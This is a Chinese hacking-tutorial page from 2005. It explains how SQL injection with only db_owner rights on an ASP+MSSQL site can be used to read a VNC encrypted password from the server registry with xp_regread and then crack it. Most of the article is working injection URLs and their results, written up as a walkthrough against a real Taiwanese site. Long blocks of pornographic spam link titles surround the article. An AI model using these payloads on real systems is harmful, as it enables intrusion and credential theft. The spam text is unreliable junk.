国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

MSSQL db_owner角色注入直接獲得系統權限
2005-12-17   

相信大家對ASP+MSSQL注入都已經很熟悉了,連一個對SQL語法絲毫不懂的人也可以用NBSI來輕松入侵大量網站。但就算是一個SQL INJECTION高手,如果針對在MSSQL中只有db_owner角色,破不出猜不到網站后臺的情況下,好像也無技可施;除了用備份得到shell的這個思路,我在網上實在沒有找出更好的入侵辦法。不過,備份得到的shell只是理論化的東東,如果一個webshell有20mb的話,你還能用它嗎?前不久,我就碰到了這樣的一個臺灣網站,管理員的密碼倒是用NBSi跑了出來,可是用戶名因為是繁體的原因在NBSi中成了一堆亂碼。我也找到了后臺,可只有干瞪眼的份。怎么辦?我又掃了它的所有端口,發現開了5900,估計是管理員用了VNC對服務器進行了遠程控制。這時,我就有一個思路,能不能把 VNC在注冊表的加密密碼讀出來再來破解呢?看我表演吧!
TELNET服務器的5900端口,得到訊息證實服務器的確用的是VNC。
相信大家都會用讀xp_regread來讀注冊表了,依次提交如下語句:
http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));
這樣我們就成功地建了一個名為cyfd的表,并且添加了類型是char,長度為255的字段名gyfd。然后向表中加數據:
_blank>http://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
從注冊表中讀出VNC在注冊表的加密密碼的值,再把值插入到剛建的表中。然后暴出VNC在注冊表的加密密碼:
_blank>http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd > 1)。
可是結果大失我所望,gyfd的值是空的。如果這樣容易的話,不會有這篇文章出現了。這是什么原因呢?我的語法不正確?翻來覆去的檢查我的語句也沒有發現錯誤呀。難道繁體的vnc在注冊表里的位置不一樣?后來我又開始在本機裝了vnc又在分析查循器里做測試,得到的結果卻是個數字5。這時czy上線了,詢問了一下,他勸我把gyfd的這個字段改成二進制數據類型 binary來試一下。于是我又在本機測試了一下,依次提交如下語句:
 http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][binary](20));
http://127.0.0.1/script.asp?id=2;DECLARE @result binary(20) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后我再用nbsi跑出cyfd表里gyfd這個字段的值。結果到是出來了,得到了vnc的加密密碼值是 0x0E3515AC00000000000000000000000000000000。可這兒還不對,我在本機裝的vnc在注冊表里的密碼值是 hex:0e,35,15,ac,00,62,d3,08這個呀。原來binary(n)的數據存儲長度是固定的,當輸入的二進制長度小于n時,余下長度填0補充。我在注入語句中寫入的binary(20)是足夠寫入vnc加密密碼的長度時,為什么還有那么多0來填充呢?這是因為正好我的vnc密碼是 0e3515ac0062d308,在碰到了00的情況下,xp_regread以為已經讀完了它的值呢,把00當成了結束符,所以只讀到了 0x0E3515AC,我暈!
翻了一下書,終于讓我找到了一個特殊的數據類型uniqueidentifier,是用來存儲一個16字節長的二進制數據類型。把注入語句改造一下:
 http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][uniqueidentifier]);
 http://127.0.0.1/script.asp?id=2;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后再用nbsi跑一下,跑出來了,不過得到的結果是AC15350E-6200-08D3-0000-000000000000。
AC15350E-6200-08D3-0000-000000000000和我在注冊表里的正確的vnc密碼的值0e3515ac0062d308 相比,能看出來有什么不同嗎?只不過順序是顛倒的,相信大家都會小學的算術,這個不用我教了。試一下用cain破出vnc的密碼,看看行不行。
看樣子在本機做的測試一切成功。這方法用到臺灣上的站點試試,哎,依然沒有跑出vnc的密碼,也許繁體vnc在注冊表的位置不同吧。不過,我研究了一上午,有了一點收獲,就放過你吧。

熱詞搜索:

上一篇:phparticle 2.0注入漏洞測試分析
下一篇:標準SQL注入入侵語句

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
成人免费观看男女羞羞视频| 美女视频免费一区| 午夜一区二区三区视频| 色婷婷av一区二区三区软件| 一区二区三区四区蜜桃| 欧美性xxxxx极品少妇| 亚洲不卡一区二区三区| 日韩午夜激情av| 国产一区二区女| 最好看的中文字幕久久| 欧美高清视频一二三区| 极品少妇一区二区三区精品视频| 国产拍欧美日韩视频二区| 色网综合在线观看| 日韩激情av在线| 中文字幕av一区二区三区免费看| 欧洲亚洲精品在线| 国内欧美视频一区二区| 中文字幕一区二区三区四区不卡 | 国产精品第一页第二页第三页| 99视频在线观看一区三区| 丝袜脚交一区二区| 国产精品美女久久久久久久久久久 | 亚洲成人激情av| 欧美在线影院一区二区| 国产剧情一区二区三区| 日韩欧美123| 国产a级毛片一区| 亚洲激情欧美激情| 26uuu欧美日本| 欧美综合在线视频| 国产一区在线观看视频| 一区二区三区国产精品| 国产网站一区二区| 欧美一级欧美三级| 波多野结衣在线一区| 日韩精品欧美成人高清一区二区| 欧美视频在线观看一区二区| 天堂资源在线中文精品| 国产视频一区在线播放| 777精品伊人久久久久大香线蕉| 福利电影一区二区| 麻豆国产精品视频| 夜夜嗨av一区二区三区| 国产精品高潮久久久久无| 精品国产乱码久久久久久老虎 | 亚洲精品高清在线观看| 久久精品亚洲乱码伦伦中文| 欧美大片免费久久精品三p| 久久99国产精品麻豆| 亚洲视频免费在线观看| 欧美激情在线观看视频免费| 精品国产乱码久久久久久牛牛| 欧美日韩视频在线第一区 | 亚洲1区2区3区4区| 亚洲一区二区三区不卡国产欧美 | 亚洲成av人片在www色猫咪| 一区二区三区色| 亚洲自拍偷拍麻豆| 亚洲动漫第一页| 图片区小说区区亚洲影院| 亚洲国产精品一区二区尤物区| 亚洲精品国产一区二区精华液 | 在线成人高清不卡| 91亚洲国产成人精品一区二三| 国产成人精品亚洲777人妖| 国产资源精品在线观看| 久久av资源网| 国产精品综合av一区二区国产馆| 国产做a爰片久久毛片| 国产最新精品免费| av亚洲精华国产精华| 色偷偷88欧美精品久久久| 欧美性大战久久久久久久 | 亚洲一区二区三区四区不卡| 亚洲激情第一区| 亚洲国产婷婷综合在线精品| 亚洲va韩国va欧美va| 久久精品国产网站| 国产99精品国产| 色综合天天视频在线观看| 欧美电影一区二区| 国产欧美日本一区视频| 玉米视频成人免费看| 日本中文在线一区| 成人av在线播放网址| 欧美日韩国产综合久久| 国产亚洲欧美日韩在线一区| 一区二区三区在线视频免费| 精品一区二区三区香蕉蜜桃 | 99久久国产综合精品麻豆| 欧美日韩精品电影| 国产午夜精品一区二区| 日韩主播视频在线| 成人app在线观看| 日韩一区二区免费高清| 亚洲欧美影音先锋| 激情图片小说一区| 69精品人人人人| 国产精品成人网| 精品综合免费视频观看| 欧美视频一二三区| 欧美国产一区在线| 日本欧美肥老太交大片| 91丨porny丨国产| 国产日韩欧美不卡| 日本亚洲视频在线| 91黄色免费版| 国产精品拍天天在线| 另类小说图片综合网| 91国内精品野花午夜精品| 国产日韩欧美制服另类| 蜜桃精品视频在线| 91 com成人网| 一区二区成人在线| 99久久免费国产| 亚洲国产成人私人影院tom| 久久精品国产亚洲高清剧情介绍| 欧美日韩一级二级三级| 亚洲柠檬福利资源导航| 成人国产视频在线观看| 国产欧美久久久精品影院| 国产一区二区三区久久久| 91精品国产综合久久久久| 亚洲成人自拍偷拍| 欧美视频完全免费看| 亚洲国产美国国产综合一区二区| 91国在线观看| 舔着乳尖日韩一区| 在线不卡中文字幕播放| 日韩中文字幕区一区有砖一区| 欧美日韩精品一二三区| 日韩电影免费一区| 日韩一区二区中文字幕| 日本在线播放一区二区三区| 日韩欧美第一区| 国内精品伊人久久久久av一坑| 精品久久久久99| 国产精品一品二品| 欧美激情一区二区三区全黄| 成人午夜精品一区二区三区| 国产精品欧美精品| 在线视频中文字幕一区二区| 天天综合天天做天天综合| 91精品国产一区二区三区香蕉| 日韩精品一区第一页| 日韩免费成人网| 国产精品一区一区三区| 亚洲国产精品传媒在线观看| 99久久精品国产一区| 午夜免费久久看| 久久综合久色欧美综合狠狠| 粉嫩13p一区二区三区| 亚洲视频在线一区| 欧美一区二区久久| 国产成人av电影在线观看| 伊人婷婷欧美激情| 6080日韩午夜伦伦午夜伦| 狠狠色丁香婷婷综合| 亚洲日本在线视频观看| 99这里都是精品| 亚洲美女一区二区三区| 欧美少妇性性性| 毛片基地黄久久久久久天堂| 久久综合久久综合久久综合| 99久久99久久免费精品蜜臀| 亚洲国产视频在线| 久久先锋影音av| 日本精品一区二区三区四区的功能| 亚洲午夜影视影院在线观看| 这里只有精品免费| 成人午夜免费视频| 亚洲成人一区二区| 国产拍欧美日韩视频二区| 欧美午夜片在线看| 国产精品亚洲成人| 亚洲成av人片在线观看| 久久久久久99久久久精品网站| 91久久精品午夜一区二区| 国产在线精品一区在线观看麻豆| 亚洲色图第一区| 久久一区二区视频| 欧美少妇bbb| 成人丝袜高跟foot| 日韩av在线免费观看不卡| 日韩伦理免费电影| 国产三级精品三级在线专区| 欧美日本精品一区二区三区| 99久久免费国产| 国产99久久久国产精品潘金 | 一区二区激情小说| 亚洲国产精品ⅴa在线观看| 日韩三区在线观看| 欧美又粗又大又爽| fc2成人免费人成在线观看播放| 韩国av一区二区三区四区| 五月婷婷综合网| 亚洲综合成人在线| 亚洲色图.com| 日韩毛片精品高清免费|